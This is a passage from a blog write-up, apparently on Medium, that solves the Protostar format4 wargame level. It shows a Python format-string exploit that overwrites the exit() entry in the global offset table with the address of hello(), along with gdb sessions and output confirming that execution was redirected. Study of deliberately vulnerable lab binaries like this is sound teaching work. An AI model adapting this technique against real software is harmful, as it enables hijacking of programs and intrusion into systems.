1 0804 — 84d2 = 8332 or in decimal it is 33586, and we add the existing 30 padding we have to have 33616.

import struct
HELLO = 0x80484b4
EXIT = 0x08049724
#Define a function to pad the input to 512 bytes due to the bufferdef padding(s):
return s+('X'*(512-len(s)))
exploit = "" #Make sure it is empty
exploit += struct.pack("I", EXIT)
exploit += struct.pack("I", EXIT+2)
exploit += "BBBBCCCC" #find how far we are from input
exploit += "%4$33956x" #Due to the space before it was one byte
exploit += "%4$n" #I have deleted the space and added 1 to the
exploit += "%5$33616x" # padding
exploit += "%5$n"
print padding(exploit)

Run:

Breakpoint 1, 0x08048503 in vuln () at format4/format4.c:20
20 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483f2
(gdb) c
Continuing.
$&BBBBCCCC
Breakpoint 2, vuln () at format4/format4.c:22
22 in format4/format4.c
(gdb) x 0x08049724
0x8049724 <_GLOBAL_OFFSET_TABLE_+36>: 0x080484b4

Nice we have overwritten it!!! Lets continue to see what happens.

(gdb) c
Continuing.
9726XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXcode execution redirected! you win
Program exited with code 01

Nice lets execute it without gdb

user@protostar:/opt/protostar/bin$ python /tmp/exp.py | ./format4
$&BBBBCCCC
...
...
...
...
8049726XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXcode execution redirected! you win

Nice WE GOT it!!!!! We redirected code execution!!!

I hope you loved it because next will be about HEAPS!!!!

— H3retic4l_Human

--

--

Nithilan Pugal
ZH3R0
Editor for

What are we? Why do we do what we do? I am just a student of life and passion. I find myself to be a cynical pink crazy marshmallow which is full of life.